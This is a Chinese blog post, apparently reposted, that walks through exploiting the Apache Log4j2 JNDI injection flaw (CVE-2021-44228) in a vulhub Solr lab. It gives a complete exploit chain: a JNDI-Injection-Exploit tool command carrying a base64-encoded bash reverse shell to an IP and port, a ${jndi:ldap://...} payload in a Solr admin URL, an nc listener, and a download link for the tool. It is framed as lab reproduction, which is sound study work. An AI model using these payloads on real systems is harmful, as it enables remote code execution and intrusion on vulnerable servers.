Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
漏洞背景
Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。
2021 年 12 月,在 Apache Log4j2 中发现了一个 0-day 漏洞。Log4j 的 JNDI 支持并没有限制可以解析的名称。一些协议像rmi:
和ldap:
是不安全的或者可以允许远程代码执行。
复现过程
首先进入vulhub靶场,找到log4j文件下的CVE-2021-44228后启动环境
启动成功后进入环境:ip:8983
进入后去寻找注入点可参考dnslog.cn,这里不再多说。
找到方向之后,下面讲一下反弹shell的过程
利用到github上的一个JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar构造payload
工具链接:https://pan.百度.com/s/1L1z3LpTBMtb7VzEVyfaLqg?pwd=75vt
提取码:75vt
启用工具构建payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4Ljk2LjEyOC82NjY2IDA JjE=}|{base64,-d}|{bash,-i}” -A “ip地址”
这里解释一下bash -C后面的命令需要进行base64编码加密,IP为反弹shell 的地址和端口,这里是6666端口
执行之后会看到熟悉的rmi和idap,利用工具生成了恶意的命令和url
下面到环境里执行恶意代码
ip:/solr/admin/cores?action=${jndi:ldap://ip:1389/i6ik5y}
发现成功重定向恶意类地址
另起一个终端监听端口
nc -lvvp 6666
此时会成功反弹shell,然后执行whoami
复现成功
也可能会因为靶场和环境问题,监听不到反弹shell,此时换其他靶场即可,比如封神台等等
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhfgjiii
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
excel下划线不显示怎么办
PHP中文网 06-23 -
excel打印预览压线压字怎么办
PHP中文网 06-22 -
怎样阻止微信小程序自动打开
PHP中文网 06-13 -
TikTok加速器哪个好免费的TK加速器推荐
TK小达人 10-01